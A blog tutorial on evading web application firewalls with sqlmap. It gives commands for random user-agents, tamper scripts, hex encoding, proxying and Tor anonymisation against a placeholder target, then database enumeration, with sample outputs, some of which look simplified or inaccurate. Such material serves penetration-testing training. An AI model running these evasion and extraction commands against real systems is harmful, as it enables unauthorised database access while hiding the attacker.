Bypassing Web Application Firewalls (WAF) Using SQLmap

Posted on by Sam Galope
Bypassing Web Application Firewalls WAF Using SQLmap
Bypassing Web Application Firewalls WAF Using SQLmap

Web Application Firewalls (WAF) play a critical role in blocking malicious traffic and protecting web applications from SQL injection attacks. However, WAFs aren’t foolproof—understanding their limitations allows penetration testers to bypass them using advanced tools and techniques. SQLmap, a popular SQL injection tool, provides built-in features to evade WAF detection by using payload obfuscation, tamper scripts, header modifications, and proxy networks.

This article will demonstrate several methods for bypassing WAF using SQLmap with step-by-step examples, practical command outputs, and detailed explanations. Whether you’re conducting security assessments or expanding your ethical hacking skills, this guide will help you understand how to navigate WAF restrictions effectively.

Table of Contents

Prerequisites

Before starting, make sure you have:

  • Termux installed: Download Termux.
  • SQLmap installed: Install with:bashCopy codepkg install python pip install sqlmap
  • A target web application: Ensure you have permission to test the system.
  • Proxy tool (e.g., Burp Suite): For analyzing blocked requests.
  • Optional: Tor Network: Configure Tor for anonymous SQLmap testing.

Bypassing WAF with SQLmap: Step-by-Step

Step 1: Initial SQL Injection Test

Begin by checking if the target is vulnerable to SQL injection.

Command:

sqlmap -u "http://target.com/page?id=1"

Sample Output:

[21:01:15] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS  
[21:01:15] [WARNING] WAF detected! Request blocked.  
[21:01:16] [ERROR] all tested parameters appear to be not injectable.

Explanation:
This output shows that the request was blocked by the WAF. SQLmap detected that the target is protected, meaning you need to use advanced techniques to bypass the WAF.

Step 2: Using SQLmap to Bypass WAF

1. Random User-Agent Header

Some WAFs block requests based on the User-Agent string. Use SQLmap’s --random-agent option to evade this.

Command:

sqlmap -u "http://target.com/page?id=1" --random-agent

Sample Output:

[21:05:23] [INFO] using a randomly selected HTTP User-Agent  
[21:05:24] [INFO] GET parameter 'id' appears to be injectable.  
[21:05:25] [INFO] available databases:
[*] target_db

Explanation:
Using a random User-Agent header tricked the WAF, allowing SQLmap to proceed with the injection.

2. Tamper Scripts for Obfuscation

SQLmap offers tamper scripts that modify payloads to bypass WAF rules. For example, the between script introduces encoded elements to evade detection.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=between

Sample Output:

[21:10:16] [INFO] GET parameter 'id' appears to be injectable.  
[21:10:17] [INFO] fetched data:  
Database: target_db  
[1 table found]  
+-------+  
| users |  
+-------+

Explanation:
The tamper script successfully encoded the payload, bypassing the WAF and retrieving data.

3. Hex Encoding Payloads

Hex encoding transforms SQL queries into hexadecimal format, confusing WAFs that don’t decode payloads.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=hexencode

Sample Output:

[21:15:43] [INFO] GET parameter 'id' appears to be injectable.  
Database: target_db  
[2 tables found]  
+---------+  
| users   |  
| orders  |  
+---------+

Explanation:
By sending hex-encoded payloads, SQLmap bypassed the WAF filters and extracted data from the database.

4. Case Manipulation to Evade WAF

Some WAFs rely on case-sensitive keyword detection. SQLmap offers case manipulation options through tamper scripts.

Command:

sqlmap -u "http://target.com/page?id=1" --tamper=uppercase

Sample Output:

[21:20:12] [INFO] found database: target_db

Explanation:
The WAF’s filtering rules didn’t account for case changes, allowing the payload to bypass detection.

Step 3: SQLmap with Proxy Tools for WAF Analysis

Use a proxy such as Burp Suite to inspect blocked requests and adjust SQLmap payloads accordingly.

Command:

sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"

Sample Output:

[21:25:46] [INFO] routing traffic through http://127.0.0.1:8080  
[21:25:50] [INFO] GET parameter 'id' appears to be injectable.

Explanation:
A proxy helps you analyze the WAF’s behavior and fine-tune your SQLmap commands for better evasion.

Step 4: Anonymizing SQLmap Requests with Tor

To avoid IP-based blocking by WAFs, route SQLmap traffic through the Tor network.

Command:

sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-tor

Sample Output:

[21:30:33] [INFO] Tor connection confirmed  
[21:30:35] [INFO] GET parameter 'id' appears to be injectable.

Explanation:
Using Tor hides your real IP address and helps bypass IP-based WAF restrictions.

Step 5: Extracting Data After Bypassing WAF

Once the WAF is bypassed, you can extract data from the database using SQLmap.

Command:

sqlmap -u "http://target.com/page?id=1" --dbs

Sample Output:

[21:35:10] [INFO] available databases:  
[*] information_schema  
[*] target_db

Conclusion

Bypassing WAFs with SQLmap requires strategic use of random agents, tamper scripts, and encoding techniques. Analyzing blocked requests through proxies and using Tor for anonymity further improves your chances of evading WAFs. Mastering these methods will enhance your penetration testing abilities, but always remember to use them responsibly and with authorization.

Disclaimer

This article is for educational purposes only. Unauthorized use of these techniques is illegal and can result in severe penalties. Always ensure that you have permission before testing any web application.

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *